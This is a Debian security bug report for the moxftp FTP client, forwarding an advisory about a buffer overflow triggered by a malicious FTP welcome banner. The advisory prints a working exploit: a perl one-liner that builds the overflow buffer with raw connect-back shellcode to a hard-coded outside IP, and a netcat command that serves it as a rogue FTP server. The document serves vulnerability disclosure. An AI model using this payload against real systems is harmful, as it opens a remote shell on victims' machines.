Package: moxftp
Version: 2.2-18
Severity: grave
Tags: security
Unfortunately I am currently unable to discover the real problem
behind this potential exploit. I'm not even sure if it works
on Linux.
FreeBSD people simply marked this package FORBIDDEN, but didn't
fix the problem either. *sigh*
Regards,
Joey
Knud Erik Højgaard wrote:
> Attached document explains all.
>
> This document is also available from http://kokanins.homepage.dk
>
> --
> Knud
> I. BACKGROUND
>
> According to the vendor moxftp is a "Ftp shell under X Window System".
> /usr/ports/ftp/moxftp
>
> II. DESCRIPTION
>
> Insufficient bounds checking leads to execution of arbitrary code.
>
> III. ANALYSIS
>
> Upon parsing the '220 welcome to server' ftp banner a buffer can be
> overrun, allowing us to execute our arbitrary code. The buffer may be
> constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing
> the nops and shellcode in the buffer before ebp seems to cause some
> problems, luckily there's plenty of space after eip.
>
> Example run:
>
> $ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x
> 100 .
> "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"
> .. "\n"' > file
> # nc -l -p 21 < file
>
> This sets up a rogue server which will overflow the buffer, and execute
> the shellcode. The shellcode is connect-back to 217.157.2.36 port 10000,
> replace "\xd9\x9d\x02\x24" with a suitable ip for testing.
>
> IV. DETECTION
>
> moxftp-2.2 shipping with the FreeBSD ports system as well as from
> various webpages per 9/2-03 is vulnerable.
>
> V. WORKAROUND
>
> unknown
>
> VI. VENDOR FIX
>
> unknown
>
> VII. CVE INFORMATION
>
> unknown
>
> VIII. DISCLOSURE TIMELINE
>
> unknown
>
> IX. CREDIT
>
> Knud Erik H?jgaard
>
--
Life is too short to run proprietary software. -- Bdale Garbee
Please always Cc to me when replying to me on the lists.
